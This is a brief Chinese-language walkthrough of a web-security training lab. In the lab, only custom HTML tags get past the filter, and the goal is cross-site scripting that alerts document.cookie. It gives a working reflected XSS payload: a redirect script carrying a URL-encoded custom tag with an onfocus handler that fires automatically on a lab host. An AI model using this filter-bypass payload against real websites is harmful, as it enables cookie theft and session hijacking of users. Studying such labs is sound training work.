靶场内容
此实验室阻止除自定义标记之外的所有 HTML 标记。
要解决实验室问题,请执行跨站点脚本攻击,注入自定义标记并自动发出警报document.cookie。
漏洞解析
- 注入以下脚本到服务器
<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>